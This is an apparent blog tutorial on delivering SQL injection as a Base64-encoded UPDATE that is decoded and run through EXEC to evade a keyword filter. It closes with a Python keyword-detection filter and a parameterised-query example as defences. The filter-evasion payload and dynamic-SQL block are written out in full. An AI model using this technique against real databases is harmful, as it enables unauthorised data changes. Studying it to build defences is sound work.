SQL Injection With Base64 And Its Prevention Mechanism

Datetime: 2016-08-23 00:14:19          Topic: SQL, SQL Injection

In my previous article, I showed how a hacker can deliver SQL injection using hex-encoded code and how to prevent it. In this article, I am going to show how a hacker can deliver SQL injection using Base64-encoded code, and the prevention mechanism for it.

The SQL code block, given below, converts a SQL query into Base64 format.

SQL code block

-- Cast the statement to VARBINARY, then let the XML value() method render the bytes as Base64
SELECT
    CAST(N'' AS XML).value(
        'xs:base64Binary(xs:hexBinary(sql:column("bin")))'
        , 'VARCHAR(MAX)'
    ) AS Base64Encoding
FROM (
    SELECT CAST('update PO_TRANSACTION_DETAILS set DESCRIPTION= ''santosh_base64'' where PO_NUMBER = 1 --/' AS VARBINARY(MAX)) AS bin
) AS bin_sql_server_temp;

After executing the SQL code block given above, the output is shown below:

Output

The SQL code block, given below, converts the hex-encoded binary value back into the actual SQL query.

SQL code block

DECLARE @S VARCHAR(MAX)
-- The 0x... literal is the VARBINARY (hex) form of the statement; casting it to VARCHAR yields the readable query
SET @S = (SELECT CAST(CAST(0x75706461746520504F5F5452414E53414354494F4E5F44455441494C5320736574204445534352495054494F4E3D202753616E746F73682720776865726520504F5F4E554D424552203D2031202D2D AS varbinary(MAX)) AS VARCHAR(MAX)))
SELECT @S

After executing the SQL code block given above, the output is shown below:

Output

The SQL code block, given below, converts the SQL query to binary, the binary to Base64, and the Base64 back to the actual query:

declare @sourceCode varbinary(max), @encodedFormat varchar(max), @decodedFormat varbinary(max)
-- 1. the plain statement as bytes
set @sourceCode = convert(varbinary(max), 'update PO_TRANSACTION_DETAILS set DESCRIPTION= ''santosh111'' where PO_NUMBER = 1 --/')
-- 2. bytes -> Base64 text
set @encodedFormat = cast('' as xml).value('xs:base64Binary(sql:variable("@sourceCode"))', 'varchar(max)')
-- 3. Base64 text -> bytes again
set @decodedFormat = cast('' as xml).value('xs:base64Binary(sql:variable("@encodedFormat"))', 'varbinary(max)')
select
    convert(varchar(max), @sourceCode) as sourceCode_varchar,
    @sourceCode as sourceCode_binary,
    @encodedFormat as encodedFormat,
    @decodedFormat as decodedFormat_binary,
    convert(varchar(max), @decodedFormat) as decodedFormat_varchar

Output

Let's say your application filters SQL reserved keywords such as UPDATE, DELETE and DROP, but it does not handle Base64-encoded input. Let's see how the hacker can inject malicious code through the application.

Actual SQL query

UPDATE PO_TRANSACTION_DETAILS SET DESCRIPTION= 'santosh_Base64' WHERE PO_NUMBER = 1 --/

SQL query converted to Base64 format

VVBEQVRFIFBPX1RSQU5TQUNUSU9OX0RFVEFJTFMgU0VUIERFU0NSSVBUSU9OPSAnc2FudG9zaF9CYXNlNjQnIFdIRVJFIFBPX05VTUJFUiA9IDEgLS0v

SQL injection using a dynamic SQL code block with the query in Base64 format

DECLARE @S VARCHAR(MAX)
-- The Base64 string is decoded to VARBINARY, cast to VARCHAR and then executed as dynamic SQL
SET @S = (SELECT CAST(CAST(N'' AS XML).value('xs:base64Binary("dXBkYXRlIFBPX1RSQU5TQUNUSU9OX0RFVEFJTFMgc2V0IERFU0NSSVBUSU9OPSAnc2FudG9zaDExMScgd2hlcmUgUE9fTlVNQkVSID0gMSAtLS8=")', 'VARBINARY(MAX)') AS VARCHAR(MAX)))
EXEC(@S)

If you observe the SQL code block above, the hacker writes a dynamic SQL block whose payload is the Base64 string passed to xs:base64Binary; because the keyword filter only inspects the raw input, it never sees the UPDATE that appears once the string is decoded and executed, so the malicious code reaches your database.

After successful execution of the SQL code block given above, the output is shown below:

Output (screenshot #1 and screenshot #2)

Prevention mechanism

You can prevent such SQL injection using the same techniques that I discussed in my previous article.
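As an added example (not code from this article or its predecessor), the Python below contrasts the naive keyword filter described above with a Base64-aware version that applies the same filter to every decoded token, and then shows the control that makes the filter unnecessary: a parameterised UPDATE in which the description can only ever be data. The regexes, function names and the in-memory sqlite3 stand-in for SQL Server are assumptions of mine; the Base64 string is the one from the article.

```python
import base64
import binascii
import re
import sqlite3

# The keyword filter the article's application applies to raw input (assumed pattern).
SQL_KEYWORDS = re.compile(r"\b(UPDATE|DELETE|DROP|INSERT|EXEC|EXECUTE)\b", re.IGNORECASE)
# Any run long enough to be a Base64-encoded statement (assumed threshold).
BASE64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

# Sample input taken from the article: the Base64 form of the UPDATE statement.
ENCODED_UPDATE = (
    "VVBEQVRFIFBPX1RSQU5TQUNUSU9OX0RFVEFJTFMgU0VUIERFU0NSSVBUSU9OPSAn"
    "c2FudG9zaF9CYXNlNjQnIFdIRVJFIFBPX05VTUJFUiA9IDEgLS0v"
)

def naive_filter_flags(value: str) -> bool:
    """Keyword filter on the raw input only: the Base64 payload slips past this."""
    return bool(SQL_KEYWORDS.search(value))

def decode_aware_filter_flags(value: str) -> bool:
    """Same filter, but also applied to every Base64 token in the input after decoding."""
    if SQL_KEYWORDS.search(value):
        return True
    for token in BASE64_TOKEN.findall(value):
        try:
            raw = base64.b64decode(token, validate=True)
        except binascii.Error:
            continue  # not valid Base64, so nothing is hidden in it
        # SQL Server may read the bytes back as VARCHAR (single-byte) or NVARCHAR (UTF-16).
        for text in (raw.decode("latin-1"), raw.decode("utf-16-le", errors="ignore")):
            if SQL_KEYWORDS.search(text):
                return True
    return False

def store_description_safely(po_number: int, description: str) -> str:
    """The fix that needs no filter: bind the value as a parameter so the database
    treats it as data and never executes it. sqlite3 stands in for SQL Server here
    (pyodbc uses the same '?' placeholders); the table is constructed in memory."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE PO_TRANSACTION_DETAILS (PO_NUMBER INTEGER, DESCRIPTION TEXT)")
    conn.execute("INSERT INTO PO_TRANSACTION_DETAILS VALUES (1, 'original')")
    conn.execute("UPDATE PO_TRANSACTION_DETAILS SET DESCRIPTION = ? WHERE PO_NUMBER = ?", (description, po_number))
    row = conn.execute("SELECT DESCRIPTION FROM PO_TRANSACTION_DETAILS WHERE PO_NUMBER = ?", (po_number,)).fetchone()
    conn.close()
    return row[0]
```

With parameter binding the encoded string is stored verbatim as the description, which is exactly the behaviour you want: it can be logged and reviewed, but it is never interpreted as SQL.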
